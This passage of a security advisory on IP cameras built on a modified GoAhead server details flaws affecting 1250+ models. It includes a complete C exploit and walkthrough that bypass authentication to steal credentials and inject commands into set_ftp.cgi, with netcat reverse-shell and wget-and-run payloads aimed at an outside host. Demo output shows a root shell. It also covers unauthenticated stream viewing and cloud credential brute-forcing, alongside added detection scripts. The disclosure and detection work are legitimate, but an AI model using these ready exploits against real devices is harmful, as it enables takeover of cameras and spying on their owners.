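        yield fields[0], fields[1], int(fields[2]), fields[6]


def find_hardcoded_root_logins(text):
    """Return (name, reason) for UID-0 accounts whose password is fixed in the image.

    'x' means the hash lives in /etc/shadow (not checked here); '*' or a leading
    '!' means the account is locked. Anything starting with '$' is a real crypt
    hash, which in firmware means every unit shares the same password.
    """
    findings = []
    for name, hash_field, uid, shell in parse_passwd(text):
        if uid != 0 or shell in NO_LOGIN_SHELLS:
            continue
        if hash_field == "":
            reason = "no password"
        elif hash_field in KNOWN_BACKDOOR_HASHES:
            reason = "known backdoor hash"
        elif hash_field.startswith("$"):
            scheme = CRYPT_SCHEMES.get(hash_field.split("$")[1], "crypt")
            reason = "hardcoded %s hash shared by every unit" % scheme
        else:
            continue  # shadowed or locked
        findings.append((name, reason))
    return findings


def pem_private_keys(pem_text):
    """Count private-key blocks in a PEM file; certificate blocks do not count."""
    return len(PRIVATE_KEY_MARKER.findall(pem_text))


def audit(passwd_text, pem_files):
    """pem_files maps path -> content. Returns human-readable findings."""
    report = []
    for name, reason in find_hardcoded_root_logins(passwd_text):
        report.append("passwd: UID 0 account '%s' with login shell: %s" % (name, reason))
    for path, content in pem_files.items():
        n = pem_private_keys(content)
        if n:
            report.append("%s: %d private key block(s) shipped in the firmware" % (path, n))
    return report


if __name__ == "__main__":
    for line in audit(SAMPLE_PASSWD, {"/system/www/pem/ck.pem": SAMPLE_PEM}):
        print(line)
```

Run it against the real files pulled from a firmware image (for example after extracting the squashfs root) by passing the file contents to `audit`; a clean image produces an empty report. Matching a known hash is cheap but brittle, so the scheme-based rule is the one that matters: any UID-0 account with a `$`-prefixed hash in a mass-produced image is a shared credential whether or not the hash has been published.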

Details – Pre-auth info leak (credentials) in the custom HTTP server

The HTTP interface is served by a custom HTTP server. This server is in fact based on GoAhead and was modified by the camera's OEM vendor (which introduced the vulnerabilities listed here). It supports two kinds of authentication:

  • htdigest authentication
  • authentication with credentials passed in the URI (?loginuse=LOGIN&loginpas=PASS)

By default, the web directory contains symbolic links pointing at the configuration files (system.ini and system-b.ini contain the credentials):

/tmp/web # ls -la *ini
lrwxrwxrwx 1 root 0 25 Oct 27 02:11 factory.ini -> /system/param/factory.ini
lrwxrwxrwx 1 root 0 30 Oct 27 02:11 factoryparam.ini -> /system/param/factoryparam.ini
lrwxrwxrwx 1 root 0 23 Oct 27 02:11 network-b.ini -> /system/www/network.ini
lrwxrwxrwx 1 root 0 23 Oct 27 02:11 network.ini -> /system/www/network.ini
lrwxrwxrwx 1 root 0 22 Oct 27 02:11 system-b.ini -> /system/www/system.ini
lrwxrwxrwx 1 root 0 22 Oct 27 02:11 system.ini -> /system/www/system.ini
/tmp/web #

With valid credentials, an attacker can retrieve the configuration as follows:

user@kali$ wget -qO- 'http://admin:admin@192.168.1.107/system.ini'|xxd

[...]
000001d0: ffff ffff ffff ffff ffff ffff ffff ffff ................
000001e0: ffff ffff ffff ffff ffff ffff ffff ffff ................
000001f0: ffff ffff ffff ffff ffff ffff ffff ffff ................
00000200: ffff ffff ffff ffff ffff ffff ffff ffff ................
00000210: ffff ffff ffff ffff ffff ffff 7b6f 1158 ............{o.X
00000220: 0000 0000 0100 0000 7469 6d65 2e6e 6973 ........time.nis
00000230: 742e 676f 7600 0000 0000 0000 0000 0000 t.gov...........
00000240: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000250: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000260: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000270: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000280: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000290: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000002a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000002b0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000002c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
[...]
00000640: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000650: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000660: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000670: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000680: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000690: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin...........
000006a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000006b0: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin...........
000006c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000006d0: 030a 0a0f 8000 0000 0101 0003 0002 0000 ................
[...]
user@kali$

To access the .cgi files, an attacker also has to authenticate:

user@kali$ wget -qO- 'http://192.168.1.107/get_params.cgi?loginuse=BAD_LOGIN&loginpas=BAD_PASS'
var result="Auth Failed";
user@kali$ wget -qO- 'http://192.168.1.107/get_params.cgi?loginuse&loginpas'
var result="Auth Failed";

But access to the .ini files is not checked correctly. An attacker can bypass authentication by supplying an empty loginuse and an empty loginpas in the URI:

user@kali$ wget -qO- 'http://192.168.1.107/system.ini?loginuse&loginpas'|xxd|less
00000000: 5749 4649 4341 4d00 0000 0000 0000 0000 WIFICAM.........
00000010: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000020: 0000 0100 0000 0000 0000 0000 0000 0000 ................
[...]
00000690: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin...........
000006a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000006b0: 6164 6d69 6e00 0000 0000 0000 0000 0000 admin...........
[...]

PoC:

./expl 192.168.1.107 --get-config | xxd | grep 000003

00000030: 6d53 6563 0a0a 5b2b 5d20 6279 7061 7373 mSec..[+] bypass
00000300: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000310: 0000 0000 0000 0000 0000 0000 0a0a 0a0a ................
00000320: 0100 0000 0a03 0100 0000 0000 0000 0000 ................
00000330: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000340: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000350: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000360: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000370: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000380: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000390: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000003a0: 0000 0000 0000 0000 0000 6164 6d69 6e00 ..........admin.
000003b0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000003c0: 0000 0000 0000 0000 0000 6164 6d69 6e00 ..........admin.
000003d0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000003e0: 0000 0000 0000 0000 0000 030a 0a0f 8000 ................
000003f0: 0000 0101 0003 0002 0000 0080 8080 8001 ................

This vulnerability lets an attacker steal credentials, including the FTP account and the SMTP (e-mail) account.

Details – Authenticated RCE as root

The RCE lives in the FTP configuration CGI. Two good write-ups (here and here) already report it for several different camera models.

The / partition is mounted read-only, so nothing on that partition can be modified.

The command injection is in set_ftp.cgi (note the $(ftp x.com)):

http://192.168.1.107/set_ftp.cgi?next_url=ftp.htm&loginuse=admin&loginpas=admin&svr=192.168.1.1&port=21&user=ftp&pwd=$(ftp x.com)ftp&dir=/&mode=PORT&upload_interval=0
http://192.168.1.107/ftptest.cgi?next_url=test_ftp.htm&loginuse=admin&loginpas=admin

Running tcpdump, we can see the DNS resolution of x.com:

00:00:00.151107 IP 192.168.1.107.33551 > 8.8.8.8.53: 40888+ A? x.com. (23)

So ftp x.com was executed.

We can use the telnetd binary to start an unauthenticated telnetd:

user@kali$ wget -qO- 'http://192.168.1.107/set_ftp.cgi?next_url=ftp.htm&loginuse=admin&loginpas=admin&svr=192.168.1.1&port=21&user=ftp&pwd=$(telnetd -p25 -l/bin/sh)&dir=/&mode=PORT&upload_interval=0'
user@kali$ wget -qO- 'http://192.168.1.107/ftptest.cgi?next_url=test_ftp.htm&loginuse=admin&loginpas=admin'

This gives us a root account on port 25/tcp:

user@kali$ telnet 192.168.1.107 25
Trying 192.168.1.107...
Connected to 192.168.1.107.
Escape character is '^]'.

/ # id
uid=0(root) gid=0
/ # uname -ap
Linux apk-link 3.10.14 #5 PREEMPT Thu Sep 22 09:11:41 CST 2016 mips GNU/Linux
/ # mount
rootfs on / type rootfs (rw)
/dev/root on / type squashfs (ro,relatime)
/proc on /proc type proc (rw,relatime)
sysfs on /sys type sysfs (rw,relatime)
tmpfs on /dev type tmpfs (rw,relatime,size=2048k)
tmpfs on /tmp type tmpfs (rw,relatime,size=5120k)
devpts on /dev/pts type devpts (rw,relatime,mode=600,ptmxmode=000)
/dev/mtdblock3 on /system type jffs2 (rw,relatime)
/ #

/etc is read-only, so the command injection cannot write to /etc. The injected value ends up in /tmp/ftpupload.sh:

/ # cat /tmp/ftpupload.sh 
/bin/ftp -n<<!
open 192.168.1.1 21
user ftp $(telnetd -l /bin/sh -p 25)ftp
binary
lcd /tmp
put ftptest.txt
close
bye
!
/ #
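Both defects described so far leave a distinctive shape on the wire: an .ini fetch whose loginuse/loginpas parameters are present but empty, and a set_ftp.cgi request whose FTP fields contain shell syntax that will be pasted verbatim into /tmp/ftpupload.sh, followed by ftptest.cgi to run it. The block below is an added detection example, not code from the advisory: it classifies HTTP request lines against those two patterns and correlates the plant/execute pair per client. The request lines are constructed (they mirror the URIs shown above); in practice they would come from an IDS, a reverse proxy in front of the camera VLAN, or request lines reconstructed from a capture, since the camera's own HTTP server keeps no access log.

```python
"""Detection helper (added example) for the two custom-HTTP-server defects:
the unauthenticated .ini read and the set_ftp.cgi command injection."""
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample request lines in the form "<client> <METHOD> <target>".
SAMPLE_REQUESTS = [
    "10.0.0.5 GET /system.ini?loginuse&loginpas",
    "10.0.0.5 GET /system-b.ini?loginuse=&loginpas=",
    "10.0.0.9 GET /get_params.cgi?loginuse=admin&loginpas=admin",
    "10.0.0.5 GET /set_ftp.cgi?next_url=ftp.htm&loginuse=admin&loginpas=admin"
    "&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc%20192.168.1.1+1337%20-e/bin/sh)"
    "&dir=/&mode=PORT&upload_interval=0",
    "10.0.0.5 GET /ftptest.cgi?next_url=test_ftp.htm&loginuse=admin&loginpas=admin",
    "10.0.0.9 GET /set_ftp.cgi?next_url=ftp.htm&loginuse=admin&loginpas=admin"
    "&svr=192.168.1.1&port=21&user=ftp&pwd=s3cret&dir=/&mode=PORT&upload_interval=0",
    "10.0.0.9 GET /livestream.cgi?loginuse=admin&loginpas=admin",
]

# The .ini files exposed through symlinks in the web directory (from the listing above).
INI_FILES = {"system.ini", "system-b.ini", "network.ini", "network-b.ini",
             "factory.ini", "factoryparam.ini"}
# FTP fields that are written into /tmp/ftpupload.sh without sanitisation.
FTP_FIELDS = ("svr", "port", "user", "pwd", "dir", "mode")
# Command substitution and separators that would survive into the script.
SHELL_META = re.compile(r"\$\(|`|;|\||&&|\n")


def classify(request_line):
    """Return a list of alert strings for one request line (empty when benign)."""
    client, _method, target = request_line.split(" ", 2)
    parts = urlsplit(target)
    name = parts.path.rsplit("/", 1)[-1]
    # keep_blank_values keeps "?loginuse&loginpas" as two empty-string params,
    # which is exactly the bypass shape; parse_qsl also %-decodes values once.
    params = dict(parse_qsl(parts.query, keep_blank_values=True))
    alerts = []
    if (name in INI_FILES and "loginuse" in params
            and params["loginuse"] == "" and params.get("loginpas", "") == ""):
        alerts.append(f"{client}: auth-bypass read of {name} (empty loginuse/loginpas)")
    if name == "set_ftp.cgi":
        for field in FTP_FIELDS:
            value = params.get(field, "")
            if SHELL_META.search(value):
                alerts.append(f"{client}: shell metacharacters in set_ftp.cgi {field}={value!r}")
    return alerts


def scan(lines):
    """Classify every line and add a correlation alert when a client that
    planted shell syntax through set_ftp.cgi then calls ftptest.cgi, which is
    the step that actually runs /tmp/ftpupload.sh."""
    alerts, planted = [], set()
    for line in lines:
        client, _method, target = line.split(" ", 2)
        found = classify(line)
        alerts.extend(found)
        if any("set_ftp.cgi" in a for a in found):
            planted.add(client)
        if urlsplit(target).path.endswith("/ftptest.cgi") and client in planted:
            alerts.append(f"{client}: ftptest.cgi after injected set_ftp.cgi: payload executed")
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_REQUESTS):
        print(alert)
```

The benign set_ftp.cgi call from 10.0.0.9 produces nothing, while 10.0.0.5 triggers four alerts: two bypass reads, the injected pwd field, and the plant/execute correlation. Because the injection point is a configuration write, the payload also persists in the camera's FTP settings until overwritten; a complementary check on the device side is to read back the stored FTP password and reject any value matching SHELL_META.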

Details – Pre-auth RCE as root

By chaining the pre-auth info leak in the custom HTTP server with the authenticated RCE as root, an attacker can achieve pre-auth RCE as root on the LAN or over the Internet.

An exploit is provided here that can be used to obtain a connect-back root RCE.

This exploit will:

  1. extract valid credentials by connecting to the custom HTTP server of the remote target camera
  2. plant a connect-back nc
  3. execute the payload
  4. give the attacker a root shell through netcat in a second terminal
  5. clean the payload stored in the configuration file

It affects 1250+ camera models.

Demo:

user@kali$ gcc -Wall -o expl expl-goahead-camera.c && ./expl 192.168.1.107 
Camera 0day root RCE with connect-back @PierreKimSec

Please run `nc -vlp 1337` on 192.168.1.1

[+] bypassing auth ... done
 login = admin
 pass = admin
[+] planting payload ... done
[+] executing payload ... done
[+] cleaning payload ... done
[+] cleaning payload ... done
[+] enjoy your root shell on 192.168.1.1:1337
user@kali$

In a second xterm:

user@kali$ nc -lvp 1337
listening on [any] 1337 ...
192.168.1.107: inverse host lookup failed: Unknown host
connect to [192.168.1.1] from (UNKNOWN) [192.168.1.107] 47968
id
uid=0(root) gid=0
uname -ap
Linux apk-link 3.10.14 #5 PREEMPT Thu Sep 22 09:11:41 CST 2016 mips GNU/Linux
ps 
PID USER TIME COMMAND
 1 root 0:01 {linuxrc} init
 2 root 0:00 [kthreadd]
 3 root 0:00 [ksoftirqd/0]
 5 root 0:00 [kworker/0:0H]
 6 root 0:00 [kworker/u2:0]
 7 root 0:00 [rcu_preempt]
 8 root 0:00 [rcu_bh]
 9 root 0:00 [rcu_sched]
 10 root 0:00 [watchdog/0]
 11 root 0:00 [khelper]
 12 root 0:00 [writeback]
 13 root 0:00 [bioset]
 14 root 0:00 [kblockd]
 15 root 0:00 [khubd]
 16 root 0:00 [kworker/0:1]
 17 root 0:00 [cfg80211]
 18 root 0:00 [rpciod]
 19 root 0:00 [kswapd0]
 20 root 0:00 [fsnotify_mark]
 21 root 0:00 [nfsiod]
 22 root 0:00 [crypto]
 36 root 0:00 [kworker/u2:1]
 39 root 0:00 [i2s_work_1]
 40 root 0:00 [i2s_codec_irq_w]
 41 root 0:00 [kworker/0:2]
 42 root 0:00 [deferwq]
 43 root 0:00 [kworker/0:1H]
 59 root 0:00 [jffs2_gcd_mtd3]
 61 root 0:00 telnetd
 69 root 0:00 /system/system/bin/wifidaemon
 70 root 0:00 /sbin/getty -L ttyS1 115200 vt100
 98 root 0:01 [RtmpTimerTask]
 99 root 0:00 [RtmpMlmeTask]
 100 root 0:00 [RtmpCmdQTask]
 101 root 0:00 [RtmpWscTask]
 148 root 1:19 /tmp/encoder
 164 root 0:00 [irq/37-isp]
 236 root 0:07 [apical_isp_fw_p]
 2330 root 0:00 sh -c /tmp/ftpupload.sh > /tmp/ftpret.txt
 2331 root 0:00 {exe} ash /tmp/ftpupload.sh
 2332 root 0:00 {exe} ash /tmp/ftpupload.sh
 2333 root 0:00 /bin/ftp -n
 2334 root 0:00 /bin/sh
 2439 root 0:00 ps

The exploit is provided here:

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>

#define CAM_PORT 80
#define REMOTE_HOST "192.168.1.1"
#define REMOTE_PORT "1337"
#define PAYLOAD_0 "GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc%20" REMOTE_HOST "+" REMOTE_PORT "%20-e/bin/sh)&dir=/&mode=PORT&upload_interval=0\r\n\r\n"
#define PAYLOAD_1 "GET /ftptest.cgi?next_url=test_ftp.htm&loginuse=%s&loginpas=%s\r\n\r\n"
#define PAYLOAD_2 "GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=passpasspasspasspasspasspasspasspass&dir=/&mode=PORT&upload_interval=0\r\n\r\n"


#define ALTERNATIVE_PAYLOAD_zero0 "GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc+" REMOTE_HOST "+" REMOTE_PORT "+-e/bin/sh)&dir=/&mode=PORT&upload_interval=0\r\n\r\n"
#define ALTERNATIVE_PAYLOAD_zero1 "GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(wget+http://" REMOTE_HOST "/stufz&&./stuff)&dir=/&mode=PORT&upload_interval=0\r\n\r\n"

char *creds(char *argv,
            int get_config);

int rce(char *argv,
        char *id,
        char attack[],
        char desc[]);


int main(int argc,
         char **argv,
         char **envp)
{
  char *id;

  printf("Camera 0day root RCE with connect-back @PierreKimSec\n\n");

  if (argc < 2)
    {
      printf("%s target\n", argv[0]);
      printf("%s target --get-config will dump the configuration and exit\n", argv[0]);
      return (1);
    }

  if (argc == 2)
    printf("Please run `nc -vlp %s` on %s\n\n", REMOTE_PORT, REMOTE_HOST);

  if (argc == 3 && !strcmp(argv[2], "--get-config"))
    id = creds(argv[1], 1);
  else
    id = creds(argv[1], 0);

  if (id == NULL)
    {
      printf("exploit failed\n");
      return (1);
    }
  printf("done\n");

  printf(" login = %s\n", id);
  printf(" pass = %s\n", id + 32);

  if (!rce(argv[1], id, PAYLOAD_0, "planting"))
    printf("done\n");
  sleep(1);
  if (!rce(argv[1], id, PAYLOAD_1, "executing"))
    printf("done\n");
  if (!rce(argv[1], id, PAYLOAD_2, "cleaning"))
    printf("done\n");
  if (!rce(argv[1], id, PAYLOAD_1, "cleaning"))
    printf("done\n");

  printf("[+] enjoy your root shell on %s:%s\n", REMOTE_HOST, REMOTE_PORT);

  return (0);
}


char *creds(char *argv,
            int get_config)
{
  int sock;
  int n;
  struct sockaddr_in serv_addr;
  char buf[8192] = { 0 };
  char *out;
  char *tmp;
  char payload[] = "GET /system.ini?loginuse&loginpas HTTP/1.0\r\n\r\n";
  int old_n;
  int n_total;


  sock = 0;
  n = 0;
  old_n = 0;
  n_total = 0;

  printf("[+] bypassing auth ... ");

  if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
    {
      printf("Error while creating socket\n");
      return (NULL);
    }

  memset(&serv_addr, '0', sizeof(serv_addr));
  serv_addr.sin_family = AF_INET;
  serv_addr.sin_port = htons(CAM_PORT);

  if (inet_pton(AF_INET, argv, &serv_addr.sin_addr) <= 0)
    {
      printf("Error while inet_pton\n");
      return (NULL);
    }

  if (connect(sock, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0)
    {
      printf("creds: connect failed\n");
      return (NULL);
    }

  if (send(sock, payload, strlen(payload), 0) < 0)
    {
      printf("creds: send failed\n");
      return (NULL);
    }

  if (!(tmp = malloc(10 * 1024 * sizeof(char))))
    return (NULL);

  if (!(out = calloc(64, sizeof(char))))
    return (NULL);

  while ((n = recv(sock, buf, sizeof(buf), 0)) > 0)
    {
      n_total += n;
      if (n_total < 1024 * 10)
        memcpy(tmp + old_n, buf, n);
      if (n >= 0)
        old_n = n;
    }

  close(sock);

  /*
    [ HTTP HEADERS ]
    ...

    000????: 0000 0a0a 0a0a 01.. .... .... .... ....
                  ^^^^ ^^^^ ^^
                  Useful reference in the binary data
                  in order to find the positions of
                  credentials
    ...
    ...
    0000690: 6164 6d69 6e00 0000 0000 0000 0000 0000  admin...........
    00006a0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
    00006b0: 6164 6d69 6e00 0000 0000 0000 0000 0000  admin...........
    00006c0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
    ...

    NOTE: reference can be too:
    000????: 0006 0606 0606 0100 000a .... .... ....

    Other method: parse everything, find the "admin" string and extract the associated password
    by adding 31 bytes after the address of 'a'[dmin].
    Works if the login is admin (seems to be this by default, but can be changed by the user)
  */

  if (get_config)
    {
      for (unsigned int j = 0; j < n_total && j < 10 * 1024; j++)
        printf("%c", tmp[j]);
      exit (0);
    }


  for (unsigned int j = 50; j < 10 * 1024; j++)
    {
      if (tmp[j - 4] == 0x0a &&
          tmp[j - 3] == 0x0a &&
          tmp[j - 2] == 0x0a &&
          tmp[j - 1] == 0x0a &&
          tmp[j] == 0x01)
        {
          if (j + 170 < 10 * 1024)
            {
              strcat(out, &tmp[j + 138]);
              strcat(out + 32 * sizeof(char), &tmp[j + 170]);
              free(tmp);

              return (out);
            }
        }
    }

  free(tmp);

  return (NULL);
}

int rce(char *argv,
        char *id,
        char attack[],
        char desc[])
{
  int sock;
  struct sockaddr_in serv_addr;
  char *payload;

  if (!(payload = calloc(512, sizeof(char))))
    return (1);

  sock = 0;

  printf("[+] %s payload ... ", desc);

  if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
    {
      printf("Error while creating socket\n");
      return (1);
    }

  memset(&serv_addr, '0', sizeof(serv_addr));
  serv_addr.sin_family = AF_INET;
  serv_addr.sin_port = htons(CAM_PORT);

  if (inet_pton(AF_INET, argv, &serv_addr.sin_addr) <= 0)
    {
      printf("Error while inet_pton\n");
      return (1);
    }

  if (connect(sock, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0)
    {
      printf("rce: connect failed\n");
      return (1);
    }


  sprintf(payload, attack, id, id + 32);
  if (send(sock, payload, strlen(payload), 0) < 0)
    {
      printf("rce: send failed\n");
      return (1);
    }

  return (0);
}

Alternatively, you can get this exploit from https://pierrekim.github.io/advisories/expl-goahead-camera.c.

Details – Other – Stream without authentication

An attacker can use the unauthenticated RTSP server running on port 10554/tcp to watch the stream without any authentication:

user@kali$ vlc rtsp://192.168.1.107:10554/tcp/av0_1

and:

user@kali$ vlc rtsp://192.168.1.107:10554/tcp/av0_0

Details – Bonus – "Cloud" (aka Botnet)

By default, the camera uses the "cloud" feature.

You can tcpdump the camera's traffic, which is quite scary:

12:09:21.410947 IP 192.168.1.107.46958 > 8.8.8.8.53: 60806+ A? openapi.xg.qq.com.gateway. (43)
12:09:26.429697 IP 192.168.1.107.58156 > 202.96.134.33.53: 60806+ A? openapi.xg.qq.com.gateway. (43)
12:09:31.450033 IP 192.168.1.107.41499 > 8.8.8.8.53: 28561+ A? www.baidu.com. (31)
12:09:35.128919 IP 192.168.1.107.13179 > 121.42.208.86.32100: UDP, length 48
12:09:35.128932 IP 192.168.1.107.13179 > 54.221.213.97.32100: UDP, length 48
12:09:35.128933 IP 192.168.1.107.13179 > 120.24.37.48.32100: UDP, length 48
12:09:36.468849 IP 192.168.1.107.44185 > 202.96.134.33.53: 28561+ A? www.baidu.com. (31)
12:09:41.488223 IP 192.168.1.107.41499 > 8.8.8.8.53: 28561+ A? www.baidu.com. (31)
12:09:46.507810 IP 192.168.1.107.44185 > 202.96.134.33.53: 28561+ A? www.baidu.com. (31)
12:09:51.527501 IP 192.168.1.107.47793 > 8.8.8.8.53: 33930+ A? www.baidu.com.gateway. (39)
12:09:56.546854 IP 192.168.1.107.53618 > 202.96.134.33.53: 33930+ A? www.baidu.com.gateway. (39)
12:10:01.566316 IP 192.168.1.107.47793 > 8.8.8.8.53: 33930+ A? www.baidu.com.gateway. (39)
12:10:06.575735 ARP, Request who-has 192.168.1.1 tell 192.168.1.107, length 46
12:10:06.575750 ARP, Reply 192.168.1.1 is-at 00:e0:4c:51:55:ed, length 28
12:10:06.585841 IP 192.168.1.107.53618 > 202.96.134.33.53: 33930+ A? www.baidu.com.gateway. (39)
12:10:11.606030 IP 192.168.1.107.46252 > 8.8.8.8.53: 41046+ A? time.nist.gov. (31)
12:10:16.625044 IP 192.168.1.107.44109 > 202.96.134.33.53: 41046+ A? time.nist.gov. (31)
12:10:19.214687 IP 192.168.1.107.13179 > 121.42.208.86.32100: UDP, length 48
12:10:19.214700 IP 192.168.1.107.13179 > 54.221.213.97.32100: UDP, length 48
12:10:19.214702 IP 192.168.1.107.13179 > 120.24.37.48.32100: UDP, length 48
12:10:21.644397 IP 192.168.1.107.46252 > 8.8.8.8.53: 41046+ A? time.nist.gov. (31)

The camera tries to resolve www.baidu.com and openapi.xg.qq.com, and contacts hardcoded IPs and hosts:

  • 121.42.208.86:32100/udp (CN: Alibaba),
  • 54.221.213.97:32100/udp (AWS US),
  • 120.24.37.48:32100/udp (CN: Alibaba),
  • www.baidu.com:80/tcp (CN: Baidu).

It seems this is the "cloud" feature, which is enabled by default. The security of this feature is not proven.

The Android application object.p2pwificam.client.apk is provided to manage my camera.
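As an added detection example (not part of the original advisory or its exploit code), the following Python parses tcpdump summary lines like those above and reports any host fanning out UDP packets to several relays on port 32100, the beacon pattern the capture shows. The sample lines are constructed from the capture above; the 192.168.1.50 host is a made-up control that talks to a single peer.

```python
import re
from collections import defaultdict

# UDP port the camera beacons to in the capture above (added example, not page code).
P2P_PORT = 32100

# tcpdump one-line summary: "HH:MM:SS.usec IP src.sport > dst.dport: payload"
LINE_RE = re.compile(
    r"^\d\d:\d\d:\d\d\.\d+ IP (?P<src>[\d.]+)\.\d+ > "
    r"(?P<dst>[\d.]+)\.(?P<dport>\d+): (?P<rest>.*)$"
)

def parse_line(line):
    """Return (src, dst, dport, rest) for an IP summary line; None for ARP etc."""
    m = LINE_RE.match(line.strip())
    return (m["src"], m["dst"], int(m["dport"]), m["rest"]) if m else None

def find_p2p_beacons(lines, port=P2P_PORT, min_relays=2):
    """Map each source to {relay_ip: packet_count} for UDP traffic to `port`.

    Only hosts that fan out to at least `min_relays` fixed rendezvous servers
    on that port, as the camera does above, are reported.
    """
    relays = defaultdict(lambda: defaultdict(int))
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        src, dst, dport, rest = parsed
        if dport == port and rest.startswith("UDP"):
            relays[src][dst] += 1
    return {s: dict(d) for s, d in relays.items() if len(d) >= min_relays}

# Constructed sample, modelled on the tcpdump output shown above.
SAMPLE = """\
12:09:31.450033 IP 192.168.1.107.41499 > 8.8.8.8.53: 28561+ A? www.baidu.com. (31)
12:09:35.128919 IP 192.168.1.107.13179 > 121.42.208.86.32100: UDP, length 48
12:09:35.128932 IP 192.168.1.107.13179 > 54.221.213.97.32100: UDP, length 48
12:09:35.128933 IP 192.168.1.107.13179 > 120.24.37.48.32100: UDP, length 48
12:10:06.575735 ARP, Request who-has 192.168.1.1 tell 192.168.1.107, length 46
12:10:19.214687 IP 192.168.1.107.13179 > 121.42.208.86.32100: UDP, length 48
12:10:19.214700 IP 192.168.1.107.13179 > 54.221.213.97.32100: UDP, length 48
12:10:19.214702 IP 192.168.1.107.13179 > 120.24.37.48.32100: UDP, length 48
12:10:21.000001 IP 192.168.1.50.40000 > 198.51.100.7.32100: UDP, length 48
""".splitlines()

if __name__ == "__main__":
    for src, seen in find_p2p_beacons(SAMPLE).items():
        print(f"{src} beacons to {len(seen)} relays on udp/{P2P_PORT}: {seen}")
```

Feeding it `tcpdump -n` output from the camera's network segment gives a quick inventory of which devices are enrolled in this "cloud" and which relays they talk to, so the traffic can be blocked at the gateway.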

2017-cam-p2pwificam-0

Netcam 360 also works:

2017-cam-netcam

It appears the network protocol is weak:

  1. The camera contacts the remote server over UDP,
  2. The application contacts the remote server over UDP,
  3. The application sends a request to the remote server asking whether the camera with a specific serial number is online,
  4. The server returns "camera doesn't exist", "camera is offline" or "camera is online",
  5. If the camera is online, a UDP tunnel is automatically established between the application and the camera, using the cloud server as a relay.

UDP tunnel:

[Android Application] <===UDP===> Cloud server <===UDP===> [Camera]

Then, the application uses the UDP tunnel to reach the camera:

1) The client sends an HTTP request to the camera with the credentials (still in cleartext),

GET check_user.cgi?&loginuse=admin&loginpas=admin&user=admin&pwd=admin&

or:

GET /check_user.cgi?&loginuse=admin&loginpas=admin&user=admin&pwd=admin&

2) The camera replies over HTTP-over-UDP whether the credentials are valid or not.

If the credentials are valid, the camera returns:

result= 0;

If the credentials are invalid, the camera returns:

result=-1

3) If the credentials are valid, the application then sends HTTP requests to the .cgi files hosted on the camera by appending the credentials to the request (?loginuse=valid_user&loginpas=valid_pass).

Step 2 in detail:

If the authentication is OK, the whole configuration is dumped in cleartext!

2017-cam-cloud-auth-ok

Note: this trace was done with one of the applications listed below, to confirm that the applications share the same "cloud" network (the daemon running on the camera does not strictly follow HTTP; note the missing / !).

If the authentication is incorrect, the camera returns:

result=-1;

Since there is no checking, an attacker can easily brute-force the credentials.

2017-cam-cloud-auth-fail

Step 3 in detail:

The application sends:

GET get_params.cgi?&loginuse=admin&loginpas=admin&user=admin&pwd=admin&

or:

GET /get_params.cgi?&loginuse=admin&loginpas=admin&user=admin&pwd=admin&

The camera replies with its whole configuration in cleartext:

var now=1122211111;
var dst_enable=0;
var dst_time=0;
var tz=0;
var ntp_enable=1;
var ntp_svr="time.nist.gov";
var dhcpen=1;
var ip="192.168.2.76";
var mask="255.255.255.0";
var gateway="192.168.2.1";
var dns1="8.8.8.8";
var dns2="192.168.2.1";
var port=80;
var nashost="";
var nasport=0;
var dev2_host="";
var dev2_alias="";
var dev2_user="";
var dev2_pwd="";
var dev2_port=0;
var dev3_host="";
var dev3_alias="";
var dev3_user="";
var dev3_pwd="";
var dev3_port=0;
var dev4_host="";
var dev4_alias="";
var dev4_user="";
var dev4_pwd="";
var dev4_port=0;
var dev5_host="";
var dev5_alias="";
var dev5_user="";
var dev5_pwd="";
var dev5_port=0;
